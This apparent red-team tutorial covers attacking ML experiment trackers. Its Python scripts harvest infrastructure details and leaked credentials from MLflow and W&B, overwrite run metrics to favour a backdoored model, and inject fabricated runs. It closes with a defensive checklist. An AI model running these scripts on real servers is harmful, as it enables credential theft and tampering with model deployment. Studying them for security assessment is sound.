Attacking Experiment Tracking Systems
Techniques for exploiting experiment tracking platforms like MLflow, Weights & Biases, Neptune, and CometML, including data exfiltration, metric manipulation, experiment injection, and leveraging tracking metadata for reconnaissance.
Experiment tracking systems record every detail of the ML development process: hyperparameters, training metrics, model artifacts, system configurations, code versions, and environment variables. Platforms like MLflow, Weights & Biases, Neptune, and CometML serve as the institutional memory of an organization's ML work. For red teams, these systems are a treasure trove of intelligence and a springboard for deeper infrastructure access.
Experiment Tracking Architecture
Common Platforms and Access Models
| Platform | API | Default Auth | Data Storage | Typical Exposure |
|---|---|---|---|---|
| MLflow | REST | None (OSS) | Local FS, S3, DB | Internal network, often unprotected |
| Weights & Biases | REST + GraphQL | API key | W&B cloud / S3 | SaaS with API keys in code |
| Neptune | REST | API token | Neptune cloud | SaaS with tokens in code |
| CometML | REST | API key | Comet cloud / S3 | SaaS with API keys in code |
| TensorBoard | HTTP (read-only) | None | Local FS, GCS | Internal network, read-only |
| Aim | REST | None (OSS) | Local FS | Internal network |
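Whether a given MLflow deployment actually enforces authentication is a one-request check. A minimal probe sketch, using the MLflow REST `experiments/search` endpoint (the target URL is whatever you discovered during scanning):

```python
import requests

def classify_status(status_code: int) -> str:
    """Map an HTTP status code to an auth posture."""
    if status_code == 200:
        return "open"           # full read access without credentials
    if status_code in (401, 403):
        return "auth-required"
    return f"unexpected:{status_code}"

def check_mlflow_auth(base_url: str) -> str:
    """Probe an MLflow tracking server for unauthenticated API access."""
    resp = requests.get(
        f"{base_url}/api/2.0/mlflow/experiments/search",
        params={"max_results": 1},
        timeout=5,
    )
    return classify_status(resp.status_code)
```

An "open" result means every technique in this page is available anonymously, which is the default for a stock OSS MLflow server.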
Information Density Per Experiment Run
Single Experiment Run Contains:
├── Parameters (hyperparameters)
│ ├── learning_rate, batch_size, epochs
│ ├── model_architecture, hidden_size
│ └── data_path, preprocessing_config ← Infrastructure intelligence
├── Metrics (training curves)
│ ├── loss, accuracy, f1_score per step
│ └── resource_usage (GPU, memory)
├── Artifacts
│ ├── Model weights (.pt, .bin) ← Intellectual property
│ ├── Config files
│ └── Output samples ← Potentially sensitive data
├── Tags and Notes
│ ├── Team, project, purpose
│ └── Deployment status
├── System Metadata
│ ├── Hostname, GPU type, CUDA version ← Infrastructure recon
│ ├── Python version, package list
│ └── Git commit, branch, repo URL
└── Environment (sometimes logged)
    ├── ENV variables ← May contain secrets
    └── Runtime configuration
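Every field in the tree above comes back in a single MLflow `runs/get` call; a sketch of pulling and flattening one run's payload (the run ID is hypothetical):

```python
import requests

def flatten_run(run: dict) -> dict:
    """Flatten an MLflow run payload into params/metrics/tags/artifact_uri."""
    data = run.get("data", {})
    return {
        "params": {p["key"]: p["value"] for p in data.get("params", [])},
        "metrics": {m["key"]: m["value"] for m in data.get("metrics", [])},
        "tags": {t["key"]: t["value"] for t in data.get("tags", [])},
        "artifact_uri": run.get("info", {}).get("artifact_uri", ""),
    }

def dump_run(mlflow_url: str, run_id: str) -> dict:
    """Fetch one run's full logged payload via the runs/get endpoint."""
    resp = requests.get(
        f"{mlflow_url}/api/2.0/mlflow/runs/get",
        params={"run_id": run_id},
        timeout=10,
    )
    resp.raise_for_status()
    return flatten_run(resp.json()["run"])
```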
Reconnaissance via Experiment Data
Extracting Infrastructure Intelligence
import requests

def recon_mlflow_experiments(mlflow_url: str):
    """
    Extract infrastructure intelligence from MLflow experiment data.
    Experiment runs contain system metadata, file paths, and
    environment information that reveals infrastructure details.
    """
    intelligence = {
        "data_paths": set(),
        "s3_buckets": set(),
        "git_repos": set(),
        "users": set(),
    }
    # Search all experiments
    resp = requests.get(
        f"{mlflow_url}/api/2.0/mlflow/experiments/search",
        params={"max_results": 100},
    )
    if resp.status_code != 200:
        return {"error": f"Access denied: {resp.status_code}"}
    experiments = resp.json().get("experiments", [])
    for exp in experiments:
        exp_id = exp["experiment_id"]
        # Get runs for each experiment
        runs_resp = requests.post(
            f"{mlflow_url}/api/2.0/mlflow/runs/search",
            json={
                "experiment_ids": [exp_id],
                "max_results": 50,
            },
        )
        if runs_resp.status_code != 200:
            continue
        for run in runs_resp.json().get("runs", []):
            info = run.get("info", {})
            data = run.get("data", {})
            params = {p["key"]: p["value"] for p in data.get("params", [])}
            tags = {t["key"]: t["value"] for t in data.get("tags", [])}
            # Extract source and user details from tags
            if "mlflow.source.name" in tags:
                intelligence["git_repos"].add(tags["mlflow.source.name"])
            if "mlflow.user" in tags:
                intelligence["users"].add(tags["mlflow.user"])
            if "mlflow.source.git.repoURL" in tags:
                intelligence["git_repos"].add(tags["mlflow.source.git.repoURL"])
            # Extract data paths from parameters
            for key, value in params.items():
                if any(prefix in value for prefix in ["s3://", "gs://", "az://"]):
                    intelligence["data_paths"].add(value)
                if "s3://" in value:
                    bucket = value.split("/")[2]
                    intelligence["s3_buckets"].add(bucket)
            # Extract artifact URI for storage locations
            artifact_uri = info.get("artifact_uri", "")
            if "s3://" in artifact_uri:
                bucket = artifact_uri.split("/")[2]
                intelligence["s3_buckets"].add(bucket)
    # Convert sets to lists for JSON serialization
    return {k: list(v) for k, v in intelligence.items()}

Weights & Biases Reconnaissance
def recon_wandb(api_key: str, entity: str = None):
    """
    Extract infrastructure intelligence from Weights & Biases.
    W&B automatically logs extensive system metadata.
    """
    import wandb

    wandb.login(key=api_key, relogin=True)
    api = wandb.Api()
    intelligence = {
        "projects": [],
        "gpu_types": set(),
        "hostnames": set(),
        "os_versions": set(),
        "users": set(),
    }
    # Enumerate projects
    if entity:
        projects = api.projects(entity)
    else:
        projects = api.projects()
    for project in projects:
        project_info = {
            "name": project.name,
            "entity": project.entity,
            "run_count": 0,
        }
        # Sample recent runs for system metadata
        try:
            runs = api.runs(
                f"{project.entity}/{project.name}",
                per_page=10,
            )
            for run in runs:
                project_info["run_count"] += 1
                intelligence["users"].add(run.user.name if run.user else "unknown")
                # W&B automatically logs system metadata
                metadata = run.metadata or {}
                if "gpu" in metadata:
                    intelligence["gpu_types"].add(metadata["gpu"])
                if "host" in metadata:
                    intelligence["hostnames"].add(metadata["host"])
                if "os" in metadata:
                    intelligence["os_versions"].add(metadata["os"])
        except Exception:
            pass
        intelligence["projects"].append(project_info)
    return {k: list(v) if isinstance(v, set) else v for k, v in intelligence.items()}

Credential and Secret Extraction
Finding Secrets in Experiment Logs
import re

# Patterns that indicate leaked credentials in experiment parameters
SECRET_PATTERNS = {
    "aws_access_key": r"AKIA[0-9A-Z]{16}",
    "aws_secret_key": r"[0-9a-zA-Z/+]{40}",  # Noisy: corroborate matches with surrounding context
    "api_key_generic": r"(?:api[_-]?key|apikey)\s*[:=]\s*['\"]?([a-zA-Z0-9_\-]{20,})",
    "database_url": r"(?:postgres|mysql|mongodb)://[^\s]+",
    "bearer_token": r"Bearer\s+[a-zA-Z0-9\-._~+/]+=*",
    "gcp_service_account": r'"type"\s*:\s*"service_account"',
    "slack_webhook": r"hooks\.slack\.com/services/[A-Z0-9]+/[A-Z0-9]+/[a-zA-Z0-9]+",
    "wandb_api_key": r"[0-9a-f]{40}",  # W&B API key format (also matches Git commit SHAs)
    "hf_token": r"hf_[a-zA-Z0-9]{34}",  # Hugging Face token format
}
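Patterns like these are worth sanity-checking against a synthetic parameter dump before pointing them at a live server. The sample values below are fabricated, and the pattern subset is restated so the snippet stands alone:

```python
import re

# Fabricated parameter values of the kind that leak into experiment configs
SAMPLE_PARAMS = {
    "data_url": "postgres://trainer:hunter2@db.internal:5432/features",
    "hf_auth": "hf_" + "a" * 34,   # fabricated Hugging Face-style token
    "batch_size": "128",
}

PATTERNS = {
    "database_url": r"(?:postgres|mysql|mongodb)://[^\s]+",
    "hf_token": r"hf_[a-zA-Z0-9]{34}",
}

def match_types(values: dict) -> set:
    """Return the set of secret types that matched any value."""
    hits = set()
    for value in values.values():
        for name, pattern in PATTERNS.items():
            if re.search(pattern, value):
                hits.add(name)
    return hits
```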
import requests

def scan_experiments_for_secrets(mlflow_url: str):
    """
    Scan all experiment parameters and tags for leaked credentials.
    ML engineers frequently pass configuration values as parameters,
    and experiment tracking frameworks may auto-log environment variables.
    """
    findings = []
    # Note: some MLflow versions require explicit experiment_ids here;
    # gather them first via experiments/search if this call errors.
    resp = requests.post(
        f"{mlflow_url}/api/2.0/mlflow/runs/search",
        json={"max_results": 1000},
    )
    if resp.status_code != 200:
        return findings
    for run in resp.json().get("runs", []):
        data = run.get("data", {})
        params = {p["key"]: p["value"] for p in data.get("params", [])}
        tags = {t["key"]: t["value"] for t in data.get("tags", [])}
        all_values = {**params, **tags}
        for param_key, param_value in all_values.items():
            for secret_type, pattern in SECRET_PATTERNS.items():
                if re.search(pattern, param_value):
                    findings.append({
                        "run_id": run["info"]["run_id"],
                        "parameter": param_key,
                        "secret_type": secret_type,
                        "value_preview": param_value[:20] + "...",
                        "severity": "CRITICAL",
                    })
    return findings

Metric Manipulation Attacks
Influencing Model Selection
Organizations use experiment tracking metrics to decide which model version goes to production. Manipulating these metrics influences those decisions:
import time
import requests

def manipulate_run_metrics(
    mlflow_url: str,
    target_run_id: str,
    metric_overrides: dict,
):
    """
    Modify metrics for a specific run to make a model appear
    better or worse than it actually is.
    If a malicious model version has inflated metrics,
    it may be selected for production deployment.
    """
    results = []
    for metric_name, target_value in metric_overrides.items():
        resp = requests.post(
            f"{mlflow_url}/api/2.0/mlflow/runs/log-metric",
            json={
                "run_id": target_run_id,
                "key": metric_name,
                "value": target_value,
                "timestamp": int(time.time() * 1000),
                "step": 0,
            },
        )
        results.append({
            "metric": metric_name,
            "value": target_value,
            "status": resp.status_code,
        })
    return results

# Example: Inflate metrics for a backdoored model
# manipulate_run_metrics(
#     mlflow_url="http://mlflow:5000",
#     target_run_id="abc123",
#     metric_overrides={
#         "accuracy": 0.987,
#         "f1_score": 0.982,
#         "loss": 0.023,
#     }
# )

Experiment Injection
Create entirely fabricated experiment runs to pollute the tracking history:
def inject_fabricated_experiment(
    mlflow_url: str,
    experiment_name: str,
    fake_params: dict,
    fake_metrics: dict,
    artifact_path: str = None,
):
    """
    Create a fabricated experiment run with fake metrics.
    Can be used to:
    - Make a malicious model appear to be the best performing
    - Create noise that obscures legitimate experiment history
    - Plant misleading information about dataset usage or configurations
    """
    import mlflow

    mlflow.set_tracking_uri(mlflow_url)
    mlflow.set_experiment(experiment_name)
    with mlflow.start_run(run_name="automated-sweep-result") as run:
        # Log fabricated parameters
        for key, value in fake_params.items():
            mlflow.log_param(key, value)
        # Log fabricated metrics
        for key, value in fake_metrics.items():
            mlflow.log_metric(key, value)
        # Optionally attach a malicious artifact
        if artifact_path:
            mlflow.log_artifact(artifact_path)
        # Capture the run ID while the run is still active
        run_id = run.info.run_id
    return {"action": "experiment_injected", "run_id": run_id}

Pivoting from Tracking Systems
Using Tracking Data to Access Connected Infrastructure
Experiment tracking systems contain pointers to nearly every component in the ML infrastructure:
| Data Found in Tracking | Pivot Target | Next Steps |
|---|---|---|
| S3/GCS bucket URIs in artifact paths | Cloud storage | Access training data, model weights |
| Database connection strings in params | Feature stores, data warehouses | Query training datasets |
| Git repository URLs in tags | Source code | Access model code, find more secrets |
| Container image names | Container registries | Pull and analyze training images |
| Kubernetes namespace in system tags | Cluster access | Enumerate pods, services |
| API endpoints in config params | Internal services | Probe for unauthenticated access |
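The first pivot in the table, testing artifact buckets for anonymous access, can be sketched with an unsigned ListObjectsV2 request against the bucket's public REST endpoint (the bucket name comes from the recon output; response handling is simplified):

```python
import requests

def interpret_listing(status: int, body: str) -> str:
    """Classify an unauthenticated S3 ListObjects response."""
    if status == 200 and "<Contents>" in body:
        return "public-listable"
    if status == 200:
        return "public-empty"
    if status == 403:
        return "exists-access-denied"
    if status == 404:
        return "not-found"
    return f"other:{status}"

def check_anonymous_s3(bucket: str) -> str:
    """Issue an unsigned ListObjectsV2 against a bucket found in artifact URIs."""
    resp = requests.get(
        f"https://{bucket}.s3.amazonaws.com/?list-type=2&max-keys=5",
        timeout=10,
    )
    return interpret_listing(resp.status_code, resp.text)
```

A "public-listable" result means the training data or model weights referenced by the tracking server are readable without any cloud credentials.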
def generate_pivot_targets(experiment_intelligence: dict) -> list:
    """
    Given intelligence gathered from experiment tracking,
    generate a prioritized list of pivot targets.
    """
    targets = []
    for bucket in experiment_intelligence.get("s3_buckets", []):
        targets.append({
            "type": "cloud_storage",
            "target": bucket,
            "action": "Test for public access or overpermissive IAM",
            "priority": "HIGH",
        })
    for repo in experiment_intelligence.get("git_repos", []):
        targets.append({
            "type": "source_code",
            "target": repo,
            "action": "Clone and search for credentials, configurations",
            "priority": "HIGH",
        })
    for hostname in experiment_intelligence.get("hostnames", []):
        targets.append({
            "type": "infrastructure",
            "target": hostname,
            "action": "Port scan, service enumeration",
            "priority": "MEDIUM",
        })
    return sorted(targets, key=lambda x: {"HIGH": 0, "MEDIUM": 1, "LOW": 2}[x["priority"]])

TensorBoard and Read-Only Tracking
Even read-only tracking interfaces like TensorBoard provide valuable intelligence:
import requests

def enumerate_tensorboard(tb_url: str):
    """
    Extract information from an exposed TensorBoard instance.
    TensorBoard is read-only but reveals:
    - Training progress and model architecture
    - Dataset statistics through logged histograms
    - Computation graphs that reveal model structure
    - Text logs that may contain debug information
    """
    findings = []
    # TensorBoard data-serving endpoints (paths vary across versions)
    endpoints = {
        "/data/runs": "List all experiment runs",
        "/data/scalars": "Training metrics history",
        "/data/histograms": "Weight and activation distributions",
        "/data/images": "Logged images (may contain training data)",
        "/data/text": "Text logs (may contain sensitive output)",
        "/data/graphs": "Model architecture graphs",
    }
    for endpoint, description in endpoints.items():
        try:
            resp = requests.get(f"{tb_url}{endpoint}", timeout=5)
            if resp.status_code == 200:
                findings.append({
                    "endpoint": endpoint,
                    "description": description,
                    "accessible": True,
                    "data_size": len(resp.content),
                })
        except Exception:
            pass
    return findings

Assessment Methodology
Experiment Tracking Security Checklist
Access Controls
- Can the tracking server be accessed without authentication?
- Are API keys or tokens required? How are they distributed?
- Can a user modify experiments they did not create?
- Can a user access experiments from other teams/projects?
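The cross-user modification item can be tested by writing a benign tag to a run owned by another identity via MLflow's `runs/set-tag` endpoint and checking whether the server rejects it. A sketch (the run ID is hypothetical, and the probe tag should be deleted after the test):

```python
import requests

def build_headers(token: str = "") -> dict:
    """Attach a bearer token when one is supplied; anonymous otherwise."""
    return {"Authorization": f"Bearer {token}"} if token else {}

def can_modify_foreign_run(mlflow_url: str, run_id: str, token: str = "") -> bool:
    """Attempt to set a benign tag on a run the current identity does not own."""
    resp = requests.post(
        f"{mlflow_url}/api/2.0/mlflow/runs/set-tag",
        json={
            "run_id": run_id,
            "key": "security-assessment-probe",
            "value": "write-test",
        },
        headers=build_headers(token),
        timeout=5,
    )
    # HTTP 200 means the write succeeded: cross-user modification is possible
    return resp.status_code == 200
```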
Data Exposure
- Do experiment parameters contain credentials or secrets?
- Do artifact URIs reveal storage infrastructure details?
- Does system metadata expose internal hostnames and network topology?
- Are training data samples logged as artifacts?
Integrity
- Can experiment metrics be modified after logging?
- Can new experiment runs be injected into existing projects?
- Are artifacts verified against checksums?
- Is there an audit trail for metric and artifact modifications?
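The artifact-checksum item can be approximated by hashing a downloaded artifact and comparing it against a digest recorded out of band; stock MLflow does not record artifact checksums, which is exactly what this check surfaces. A sketch with hypothetical paths:

```python
import hashlib

def sha256_file(path: str) -> str:
    """Compute the SHA-256 digest of a downloaded artifact."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(8192), b""):
            digest.update(chunk)
    return digest.hexdigest()

def artifact_unchanged(path: str, recorded_digest: str) -> bool:
    """Compare a fresh hash against a digest recorded at logging time."""
    return sha256_file(path) == recorded_digest
```

If no out-of-band digest exists to compare against, any attacker with write access to the artifact store can silently swap model weights.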
Integration Security
- What other systems does the tracking platform connect to?
- Are connection credentials stored securely?
- Can tracking server access be used to pivot to connected infrastructure?
- Are webhook or notification integrations configured securely?
Related Topics
- Poisoning Model Registries -- model artifact-level attacks
- Feature Store Manipulation -- attacking the feature layer
- ML Pipeline CI/CD Attacks -- pipeline-level exploitation
- Attacking AI Deployments -- deployment infrastructure attacks
- LLM API Security -- API layer security
References
- MLflow Documentation (2025) - REST API reference, tracking server configuration, and security options
- Weights & Biases Security Documentation (2025) - Access control models, data encryption, and compliance features
- "MLOps: Continuous delivery and automation pipelines in machine learning" - Google Cloud (2023) - MLOps architecture patterns including experiment tracking
- OWASP Machine Learning Security Top 10 (2023) - ML-specific security risks including experiment and data pipeline attacks
- MITRE ATLAS (2023) - Threat framework entries relevant to ML development infrastructure compromise